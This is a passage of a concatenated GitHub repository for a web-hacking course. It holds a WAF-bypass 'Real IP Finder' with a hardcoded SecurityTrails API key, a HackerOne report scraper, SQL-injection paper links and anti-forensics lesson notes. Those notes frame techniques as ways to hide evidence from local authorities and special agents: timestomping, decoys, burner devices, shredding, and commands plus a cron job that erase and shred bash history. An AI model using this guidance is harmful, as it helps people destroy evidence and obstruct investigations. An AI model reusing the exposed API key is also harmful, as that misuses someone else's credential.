", "") 42 | result = result.replace("","") 43 | #print (result) 44 | 45 | result_list.append(result) # Dont use a = a.appnd(b) just use a.append(b) 46 | 47 | result_rm_duplicate = list(set(result_list)) 48 | 49 | for resultFinal in result_rm_duplicate: 50 | if str(resultFinal) == str("www."+domain_name): 51 | pass 52 | else: 53 | print(resultFinal) 54 | 55 | 56 | 57 | 58 | 59 | -------------------------------------------------------------------------------- /MPC_python_tools/recon_tools/wafbypass_ip_finder.py: -------------------------------------------------------------------------------- 1 | 2 | import requests 3 | import colorama 4 | from colorama import Fore, Style 5 | import json 6 | from termcolor import colored, cprint 7 | import pyfiglet 8 | 9 | #My Banner 10 | 11 | banner = pyfiglet.figlet_format("Real IP Finder", font = "slant") 12 | cprint(banner, 'green', attrs=['blink']) 13 | cprint(" by Dr.404\n",'green',attrs=['blink']) 14 | 15 | # print() 16 | # For colored Output 17 | 18 | colorama.init(Style.BRIGHT) 19 | blue = Fore.BLUE+Style.BRIGHT 20 | green = Fore.GREEN+Style.BRIGHT 21 | reset = Fore.RESET 22 | 23 | 24 | # Requesting Input 25 | cprint("Please edit the 'key' variable with your securityTrail API Key!!!! 
\n",'blue') 26 | domain = str(input("Enter your domain : ")) 27 | print() 28 | 29 | # PLease type your API key in Key parameter 30 | key = "6jWeKbd49Q1cEvwp0Ri5TyWsyD3ttkce" # Edit this with your API key 31 | 32 | 33 | # Requesting API json Data 34 | 35 | url = "https://api.securitytrails.com/v1/history/"+domain+"/dns/a" 36 | headers = { 37 | 38 | "Accept": "application/json", 39 | 40 | "APIKEY": key 41 | 42 | } 43 | response = requests.get(url, headers=headers) 44 | response_json = response.json() 45 | 46 | responseData = response_json["records"] 47 | 48 | for data in responseData: 49 | try: 50 | ip = data['values'][0]['ip'] 51 | org = data['organizations'][0] 52 | date = data['last_seen'] 53 | if org == "Cloudflare, Inc.": 54 | pass 55 | else: 56 | print("The Real IP of Domain may be : ",blue+ip+reset) 57 | print("The Organization of Domain Hosted is : ",blue+org+reset) 58 | print("This IP is Last seen on : ",blue+ date +reset) 59 | print() 60 | except: IndexError 61 | -------------------------------------------------------------------------------- /MPC_python_tools/writeup_finder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """ 3 | Tool Creater : Dr.404 4 | Tools Version : 1.0.1 5 | Organization : Myanmar Pentester Community 6 | 7 | Google Search Scraper for HackerOne Reports 8 | 9 | This tool allows you to scrape Google search results to find reports on hackerone.com based on an intext query. 10 | It supports scraping multiple pages and dynamically searching for topics using intext queries. 11 | 12 | Usage: 13 | hackerone_scraper.py -q QUERY [-n NUM_PAGES] [-o OUTPUT_FILE] 14 | 15 | Example: 16 | hackerone_scraper.py -q "graphql" -n 5 -o reports.txt 17 | 18 | Options: 19 | -q, --query The intext search query (e.g., "graphql", "XSS", etc.) 20 | -n, --num_pages (Optional) The number of Google search result pages to scrape. Default is 5. 
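    -o, --output      (Optional) The file to save the output links. If not provided, outputs to console.

Note:
    Use responsibly and beware of Google’s scraping limitations.
"""

import argparse
import re
import sys
import time
from urllib.parse import parse_qs, urlparse

import requests
from bs4 import BeautifulSoup
from colorama import Fore, Style, init

# Initialize colorama
init(autoreset=True)

SEARCH_URL = "https://www.google.com/search"

# Headers to mimic a browser request
HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
}

# Seconds to wait for Google; without a timeout a stalled connection hangs the tool forever.
REQUEST_TIMEOUT = 15

# Pause between result pages so the scraper does not trip Google's rate limiting.
PAGE_DELAY_SECONDS = 2

# Only redirect targets that look like a hackerone report page are kept
# (same prefix the original regex matched on).
_REPORT_RE = re.compile(r"https://hackerone\.com/reports.+")


class HackerOneScraper:
    """Collect hackerone.com report links from Google search result pages.

    Attributes:
        query: The full Google query string (the caller adds the ``site:``/``intext:`` operators).
        num_pages: How many result pages (10 results each) to request.
        output_file: Path to write the links to, or ``None`` to print them to the console.
        links: Unique report URLs found so far, in discovery order.
    """

    def __init__(self, query, num_pages=5, output_file=None):
        self.query = query
        self.num_pages = num_pages
        self.output_file = output_file
        self.links = []
        # Google lists the same report under several anchors; this keeps `links` duplicate-free.
        self._seen = set()

    @staticmethod
    def report_url_from_href(href):
        """Return the hackerone report URL wrapped in a Google redirect href, or ``None``.

        Google wraps organic results in a redirect of the form ``/url?q=<target>&...``
        (older markup used ``url=``); anything that is not such a redirect, or whose
        target is not a hackerone report, yields ``None``.

        Args:
            href: The ``href`` attribute of an anchor on the result page (may be ``None``).
        """
        if not href or "/url?" not in href:
            return None
        params = parse_qs(urlparse(href).query)
        for key in ("q", "url"):
            for candidate in params.get(key, []):
                if _REPORT_RE.match(candidate):
                    return candidate
        return None

    def fetch_page(self, start):
        """Request one result page and return its HTML, or ``None`` when the request fails.

        Args:
            start: Offset of the first result on the page (0, 10, 20, ...).
        """
        params = {"q": self.query, "start": start}
        try:
            response = requests.get(SEARCH_URL, headers=HEADERS, params=params, timeout=REQUEST_TIMEOUT)
            # A 429/503 means Google is throttling us; parsing that page would silently yield nothing.
            response.raise_for_status()
        except requests.RequestException as exc:
            print(Fore.RED + f"Request for results starting at {start} failed: {exc}", file=sys.stderr)
            return None
        return response.text

    def extract_links_from_page(self, start):
        """Extract report links from a single Google search result page.

        Args:
            start: Offset of the first result on the page.

        Returns:
            ``True`` when the page was fetched and parsed, ``False`` when the request failed.
        """
        html = self.fetch_page(start)
        if html is None:
            return False
        soup = BeautifulSoup(html, "html.parser")
        for anchor in soup.find_all("a"):
            report_url = self.report_url_from_href(anchor.get("href"))
            if report_url and report_url not in self._seen:
                self._seen.add(report_url)
                self.links.append(report_url)
        return True

    def scrape(self):
        """Main logic to scrape multiple pages, stopping early if Google refuses a request."""
        for page_num in range(self.num_pages):
            if page_num:
                # Sleep to avoid being blocked by Google (only between pages, not after the last one).
                time.sleep(PAGE_DELAY_SECONDS)
            if not self.extract_links_from_page(page_num * 10):
                # Continuing against a server that already refused us only makes a block more likely.
                print(Fore.YELLOW + "Stopping early; keeping the links collected so far.")
                break

    def output_results(self):
        """Output the results to a file or console."""
        if self.output_file:
            with open(self.output_file, "w", encoding="utf-8") as f:
                f.writelines(link + "\n" for link in self.links)
            print(Fore.GREEN + f"\nFound {len(self.links)} links. Saved to '{self.output_file}'.")
        elif self.links:
            print(Fore.GREEN + "\nFound the following report links:")
            for link in self.links:
                print(Fore.CYAN + link)
        else:
            print(Fore.RED + "\nNo report links found.")


def main():
    """Parse command-line arguments, run the scraper and print or save the results."""
    parser = argparse.ArgumentParser(description="Google Search Scraper for HackerOne Reports")
    parser.add_argument('-q', '--query', type=str, required=True, help='The intext search query (e.g., "graphql", "XSS", etc.)')
    parser.add_argument('-n', '--num_pages', type=int, default=5, help='The number of Google search result pages to scrape. Default is 5.')
    parser.add_argument('-o', '--output', type=str, help='The file to save the output links. If not provided, outputs to console.')
    args = parser.parse_args()

    # A zero or negative page count would silently do nothing; make that an explicit usage error.
    if args.num_pages < 1:
        parser.error("--num_pages must be at least 1")

    scraper = HackerOneScraper(f"site:hackerone.com intext:{args.query}", args.num_pages, args.output)

    print(Fore.YELLOW + f"Searching for reports related to '{args.query}' on HackerOne...")
    scraper.scrape()
    scraper.output_results()


if __name__ == '__main__':
    main()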
The term "hacking" in this class means... 4 | 5 | 1. Not for stealing social media accounts 6 | 2. Not for phishing 7 | 3. Not for defacement 8 | 9 | 10 | ## The term "hacking" in this class means... 11 | 1. Bug Bounty 12 | 2. CTF 13 | 3. Penetration testing 14 | 4. Learning and problem solving 15 | 16 | 17 | # Course Outline 18 | 19 | ![Course Outline](./photo/outline.png) 20 | 21 | -------------------------------------------------------------------------------- /course_outline/photo/outline.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/course_outline/photo/outline.png -------------------------------------------------------------------------------- /gitPush.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | read -p 'Write your commit?: ' commit 4 | 5 | git add . 6 | git commit -m "$commit" 7 | git push -u origin main 8 | -------------------------------------------------------------------------------- /lesson_notes/Anit_forensics(Mini_Course)/AnitForensive_Day2.md: -------------------------------------------------------------------------------- 1 | # Anti-Forensics Day-2 2 | 3 | ## Securing Your Credentials 4 | 5 | 1. Never store passwords in the browser 6 | 2. 
Use a password manager 7 | 8 | ## Securing your messages (encryption, continued) 9 | 10 | CyberChef download link 11 | `https://github.com/gchq/CyberChef/releases/download/v9.46.0/CyberChef_v9.46.0.zip` 12 | 13 | ## Overwriting Metadata 14 | 15 | - The Windows registry key 16 | `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate` can be set to “1” to 17 | disable updating of the last-accessed timestamp; 18 | 19 | ## Data Wiping 20 | 21 | - secure data deletion 22 | 23 | ``` 24 | BleachBit (Windows) 25 | Shredder (Linux) 26 | iShredder (Android) 27 | ``` 28 | 29 | ## In Linux 30 | 31 | `sudo apt install bleachbit` 32 | 33 | US DoD (Department of Defense) standard wiping 34 | 35 | - Overwrite the drive with 0 36 | - Overwrite the drive with 1 37 | - Overwrite the drive with random data 38 | 39 | Elliot uses this standard in the Mr. Robot series 40 | 41 | 42 | `shred -f -n 3 test.txt` 43 | 44 | 45 | 46 | ``` 47 | f = Forces the change of permission 48 | 49 | n = number of overwrite passes 50 | ``` -------------------------------------------------------------------------------- /lesson_notes/Anit_forensics(Mini_Course)/AntiForensive_Methodology.md: -------------------------------------------------------------------------------- 1 | # Anti-forensics 2 | 3 | #### Credit `@dnsprincess` for all methodology 4 | 5 | 1. Avoiding detection 6 | 2. Disrupting the collection of information 7 | 3. Increasing the time an examiner has to spend on a case 8 | 9 | 10 | # General Methodology 11 | 12 | 1. Encryption 13 | 2. Misdirection 14 | 3. Changing Timestamps 15 | 4. Secure Data Wiping 16 | 5. Steganography 17 | 18 | ## Level of Hiding 19 | 20 | #### 1. From Your family (security controls) 21 | eg. Private content 22 | * Use a vault application or change the extension 23 | * Low anti-forensic use 24 | * Tools easily found online 25 | 26 | 27 | #### 2. Local Authorities (Obfuscate) 28 | eg. 
Small incidents 29 | * They may understand beginner-level forensics 30 | * They use packages like Cellebrite, Autopsy, etc... 31 | * Tool dependent 32 | * Mildly intrusive anti-forensics 33 | 34 | Our Tools 35 | * Hex editor 36 | * Forensic packages 37 | * Removable media 38 | * Decoy, false fruit 39 | 40 | 41 | #### 3. Special Agent (???) (unusable evidence) 42 | eg. Interstate Action ?? 43 | More proficient, not tool dependent 44 | 45 | Our Tools 46 | * End-to-End Encryption 47 | * Autopsy 48 | * SpiderOak 49 | * Burner device 50 | * Soldered storage media 51 | 52 | #### 4. Nation or State Op?? (burn) 53 | Espionage 54 | Burn it all down 55 | 56 | 57 | #### Strategy 58 | 59 | 1. Evidence Doubt - Your family, Local Auth 60 | 2. Attribution Doubt - Agents 61 | 62 | 63 | # Specific Techniques 64 | 65 | ## Your Family, Local Auth 66 | 67 | #### 1. Renaming file extension (Your Family, Local Auth) 68 | #### 2. Vault App (Forensic tools can easily find these) 69 | #### 3. Changing file header - Forensics software can detect file headers 70 | #### 4. Steganography 71 | ``` 72 | Don't leave any trace of the stego application on your system 73 | Check against Stegdetect 74 | StegFS in Linux 75 | ``` 76 | 77 | ## Special Agent && Nation State ?? 78 | 79 | #### 5. Shredding - Completely delete and overwrite disk space 80 | #### 6. Timestomp (To defeat timeline analysis in forensics) 81 | 82 | 83 | #### Things you need to delete 84 | 85 | 1. All file fragments 86 | 2. All metadata 87 | 3. Traced items (thumbnails) 88 | 89 | 90 | # Practical Anti-Forensics 91 | 92 | #### 1. Misdirection 93 | 94 | 1. Renaming file extension 95 | 2. Changing file header 96 | 3. Timestomping 97 | 98 | 99 | #### 2. Encryption 100 | 101 | 1. aescrypt (GUI + CLI) 102 | 103 | 104 | #### 3. 
File Wiping (Shredding) 105 | 106 | Normal Data Wipe 107 | 108 | - use BleachBit 109 | 110 | In Linux 111 | 112 | `sudo apt install bleachbit` 113 | 114 | US DoD (Department of Defense) standard wiping 115 | 116 | - Overwrite the drive with 0 117 | - Overwrite the drive with 1 118 | - Overwrite the drive with random data 119 | 120 | Elliot uses this standard in the Mr. Robot series 121 | 122 | 123 | `shred -f -n 3 test.txt` 124 | 125 | 126 | 127 | ``` 128 | f = Forces the change of permission 129 | 130 | n = number of overwrite passes 131 | ``` 132 | 133 | 134 | 135 | -------------------------------------------------------------------------------- /lesson_notes/Anit_forensics(Mini_Course)/note.md: -------------------------------------------------------------------------------- 1 | # Anti-forensics 2 | 3 | ## BleachBit 4 | 5 | BleachBit is free and open-source software that, rather than just deleting files, actually shreds the files and any slack space, making it virtually impossible to recover affected files. Not only that, but BleachBit is smart enough to remove other traces of files and applications that forensic investigators can find, such as Most Recently Used (MRU) lists, Prefetch files, clipboard contents, cookies, history files, temp files, memory dumps, uninstallers and more. 6 | 7 | #### BleachBit download links 8 | 9 | `http://www.bleachbit.org/download` 10 | 11 | #### For Kali-Linux 12 | 13 | `sudo apt install bleachbit` 14 | 15 | #### BleachBit usage in Linux 16 | 17 | `shred -f -n 3 test.txt` 18 | 19 | ``` 20 | f = Forces the change of permission 21 | 22 | n = number of overwrite passes 23 | 24 | Elliot uses these commands in the Mr. Robot series 25 | ``` 26 | 27 | ## Linux Bash shell Anti-Forensics 28 | #### 1. Disabling History 29 | 30 | `export HISTSIZE=0` 31 | 32 | #### 2. Clearing History 33 | 34 | `history -c` 35 | 36 | #### 3. Clearing User Complete History 37 | 38 | `cat /dev/null > ~.bash_history && history -c && exit` 39 | 40 | # ****USE WITH CAUTION**** 41 | 42 | #### 4. 
Shredding the history (use with caution) 43 | 44 | `shred ~/.bash_history` 45 | 46 | #### 5. Automating the Clearing of Command History 47 | 48 | ``` 49 | crontab -e 50 | 51 | * * * shred ~/.bash_history && cat /dev/null > .bash_history 52 | ``` 53 | This command will execute each morning at 1am, first shredding the bash_history and then erasing the bash_history. Note that I did not include the history -c command, as it is an internal BASH shell command and cannot be used in crontab. 54 | 55 | 56 | # Hex Editor 57 | 58 | #### Windows hex editor 59 | 60 | `WinHex` 61 | 62 | #### Steganography on Windows 63 | 64 | `Quick stegno` 65 | `stool` 66 | 67 | # Encryption 68 | 69 | `aescrypt` 70 | 71 | `veracrypt` 72 | `kleopatra` -------------------------------------------------------------------------------- /lesson_notes/Paper/Anti_Forencis/Anti-Forensic Techniques_1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/Anti_Forencis/Anti-Forensic Techniques_1.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/Anti_Forencis/Anti-Forensics-LayerOne-Paul_Henry.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/Anti_Forencis/Anti-Forensics-LayerOne-Paul_Henry.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/Anti_Forencis/anti-forensics-aide.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/Anti_Forencis/anti-forensics-aide.pdf -------------------------------------------------------------------------------- 
/lesson_notes/Paper/DBMS_7thEdition.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/DBMS_7thEdition.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/SQL_Injection/A Study of Out-of-Band SQL Injection.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/SQL_Injection/A Study of Out-of-Band SQL Injection.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/SQL_Injection/A_novel_method_for_SQL_injection_attack_detection_.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/SQL_Injection/A_novel_method_for_SQL_injection_attack_detection_.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/SQL_Injection/Boolean_based_SQLi_1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/SQL_Injection/Boolean_based_SQLi_1.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/SQL_Injection/Boolean_based_SQLi_2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/SQL_Injection/Boolean_based_SQLi_2.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/SQL_Injection/ErrorBaseDoubleQueryInjection.pdf: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/SQL_Injection/ErrorBaseDoubleQueryInjection.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/SQL_Injection/ErrorBaseDoubleQueryInjection_2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/SQL_Injection/ErrorBaseDoubleQueryInjection_2.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/SQL_Injection/ErrorBaseDoubleQueryInjection_3.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/SQL_Injection/ErrorBaseDoubleQueryInjection_3.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/SQL_Injection/The Ultimate Guide to SQL Injection _ PurpleBox.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/SQL_Injection/The Ultimate Guide to SQL Injection _ PurpleBox.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/SQL_Injection/sql2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/SQL_Injection/sql2.png -------------------------------------------------------------------------------- /lesson_notes/Paper/fileUploadVulnerabity.pdf: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/fileUploadVulnerabity.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | In the interest of fostering an open and welcoming environment, we as 6 | contributors and maintainers pledge to making participation in our project and 7 | our community a harassment-free experience for everyone, regardless of age, body 8 | size, disability, ethnicity, sex characteristics, gender identity and expression, 9 | level of experience, education, socio-economic status, nationality, personal 10 | appearance, race, religion, or sexual identity and orientation. 11 | 12 | ## Our Standards 13 | 14 | Examples of behavior that contributes to creating a positive environment 15 | include: 16 | 17 | * Using welcoming and inclusive language 18 | * Being respectful of differing viewpoints and experiences 19 | * Gracefully accepting constructive criticism 20 | * Focusing on what is best for the community 21 | * Showing empathy towards other community members 22 | 23 | Examples of unacceptable behavior by participants include: 24 | 25 | * The use of sexualized language or imagery and unwelcome sexual attention or 26 | advances 27 | * Trolling, insulting/derogatory comments, and personal or political attacks 28 | * Public or private harassment 29 | * Publishing others' private information, such as a physical or electronic 30 | address, without explicit permission 31 | * Other conduct which could reasonably be considered inappropriate in a 32 | professional setting 33 | 34 | ## Our Responsibilities 35 | 36 | Project maintainers are responsible for clarifying the 
standards of acceptable 37 | behavior and are expected to take appropriate and fair corrective action in 38 | response to any instances of unacceptable behavior. 39 | 40 | Project maintainers have the right and responsibility to remove, edit, or 41 | reject comments, commits, code, wiki edits, issues, and other contributions 42 | that are not aligned to this Code of Conduct, or to ban temporarily or 43 | permanently any contributor for other behaviors that they deem inappropriate, 44 | threatening, offensive, or harmful. 45 | 46 | ## Scope 47 | 48 | This Code of Conduct applies both within project spaces and in public spaces 49 | when an individual is representing the project or its community. Examples of 50 | representing a project or community include using an official project e-mail 51 | address, posting via an official social media account, or acting as an appointed 52 | representative at an online or offline event. Representation of a project may be 53 | further defined and clarified by project maintainers. 54 | 55 | ## Enforcement 56 | 57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 58 | reported by contacting the project team at theinfecteddrake@gmail.com. All 59 | complaints will be reviewed and investigated and will result in a response that 60 | is deemed necessary and appropriate to the circumstances. The project team is 61 | obligated to maintain confidentiality with regard to the reporter of an incident. 62 | Further details of specific enforcement policies may be posted separately. 63 | 64 | Project maintainers who do not follow or enforce the Code of Conduct in good 65 | faith may face temporary or permanent repercussions as determined by other 66 | members of the project's leadership. 
67 | 68 | ## Attribution 69 | 70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, 71 | available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html 72 | 73 | [homepage]: https://www.contributor-covenant.org 74 | 75 | For answers to common questions about this code of conduct, see 76 | https://www.contributor-covenant.org/faq 77 | -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | I appreciate and recognize [all contributors](https://github.com/0xInfection/awesome-waf/graphs/contributors). 2 | 3 | > First of all thank you for even considering of contributing to this awesome list. __"The community just learns from each other"__. 4 | 5 | ## Table of Contents 6 | 7 | - [Contribution guidelines](#contribution-guidelines) 8 | - [Quality Standard](#quality-standard) 9 | - [Adding to this list](#adding-to-this-list) 10 | - [Adding something to an awesome list](#adding-something-to-an-awesome-list) 11 | - [Updating your Pull Request](#updating-your-pull-request) 12 | 13 | ## Contribution Guidelines 14 | 15 | __Your pull request/commit message will be a tweet, please keep that in mind.__ :) 16 | 17 | - **To add to the list:** Submit a pull request. 18 | - **To remove from the list:** Submit a pull request. 19 | - Want to change something: Submit a pull request. 20 | - Want to try something else: Submit a pull request. 21 | - Don't know what to do: Submit a pull request or open an issue, let me know what's going on. 22 | 23 | [Awesome-WAF](https://github.com/0xinfection/awesome-waf) is a hand-crafted list for high-quality information about web application firewalls and its resources. Following items are recommended to be kept in mind. 24 | 25 | - If you are submitting a new fingerprint, include the headers/page source, etc. 
26 | - Do not include the URL as it may expose the integrity of the site. 27 | > I will contact you personally if necessary via email. 28 | - Item you're adding should not be duplicate, no redirection (be careful with `http` vs `https`!). 29 | - The link should be the name of the slide or project or website. 30 | - Description should be clear and concise (read it out loud to be sure). 31 | - Description should follow the link, on the same line. 32 | - if you want to add more than one link, please don't do all PR on the exact same line, it usually results in conflicts and your PR cannot be automatically merged. 33 | 34 | Please contribute links to slides/tools you have used or are familiar with. This will help ensure high-quality entries. 35 | 36 | ## Quality Standard 37 | 38 | Note that we can help you achieve those standards, just try your best, be brave. 39 | We'll guide you to the best of our abilities. 40 | 41 | To be on the list, it would be *nice* if entries adhere to these quality standards: 42 | 43 | - Generally useful to the community. 44 | - Clearly stating "what is it for": mention the problem it solves. Just try your best, make it clear for the next person. 45 | - Solves a real problem (even a small one) 46 | - If your PR is a **WIP** (work in progress, not safe for production), mention it. 47 | 48 | If your PR is not merged, I will tell you why so that you may be able to improve it. 49 | 50 | ## Contribution Guidelines 51 | 52 | ### Adding to this List 53 | 54 | Please ensure your pull request adheres to the following guidelines: 55 | 56 | - Search previous suggestions before making a new one, as yours may be a duplicate. 57 | - Make sure the list is useful before submitting. That implies it has enough content and every item has a good succinct description. 58 | - Make an individual pull request for each suggestion. 59 | - Use [title-casing](http://titlecapitalization.com) (AP style). 
60 | - Use the following format: `[List Name](link)` 61 | - Link additions should be added to the bottom of the relevant category. 62 | - New categories or improvements to the existing categorization are welcome. 63 | - Check your spelling and grammar. 64 | - Make sure your text editor is set to remove trailing whitespace. 65 | - The pull request and commit should have a useful title. 66 | - The body of your commit message should contain a link to the repository. 67 | 68 | Thank you for your contributions! 69 | 70 | ### Adding something to an Awesome List 71 | 72 | If you have something awesome to contribute to an awesome list, this is how you do it. 73 | 74 | You'll need a [GitHub account](https://github.com/join)! 75 | 76 | 1. Access the awesome list's GitHub page. For example: https://github.com/sindresorhus/awesome 77 | 2. Click on the `readme.md` file: 78 | 79 | ![Step 2 Click on Readme.md](https://cloud.githubusercontent.com/assets/170270/9402920/53a7e3ea-480c-11e5-9d81-aecf64be55eb.png) 80 | 81 | 3. Now click on the edit icon. 82 | 83 | ![Step 3 - Click on Edit](https://cloud.githubusercontent.com/assets/170270/9402927/6506af22-480c-11e5-8c18-7ea823530099.png) 84 | 85 | 4. You can start editing the text of the file in the in-browser editor. Make sure you follow guidelines above. You can use [GitHub Flavored Markdown](https://help.github.com/articles/github-flavored-markdown/). 86 | 87 | ![Step 4 - Edit the file](https://cloud.githubusercontent.com/assets/170270/9402932/7301c3a0-480c-11e5-81f5-7e343b71674f.png) 88 | 89 | 5. Say why you're proposing the changes, and then click on "Propose file change". 90 | 91 | ![Step 5 - Propose Changes](https://cloud.githubusercontent.com/assets/170270/9402937/7dd0652a-480c-11e5-9138-bd14244593d5.png) 92 | 93 | 6. Submit the [pull request](https://help.github.com/articles/using-pull-requests/)! 
94 | 95 | ### Updating your Pull Request 96 | 97 | Sometimes, a maintainer of an awesome list will ask you to edit your Pull Request before it is included. This is normally due to spelling errors or because your PR didn't match the awesome-* list guidelines. 98 | 99 | [Here](https://github.com/RichardLitt/knowledge/blob/master/github/amending-a-commit-guide.md) is a write up on how to change a Pull Request, and the different ways you can do that. -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 
29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 
61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. 
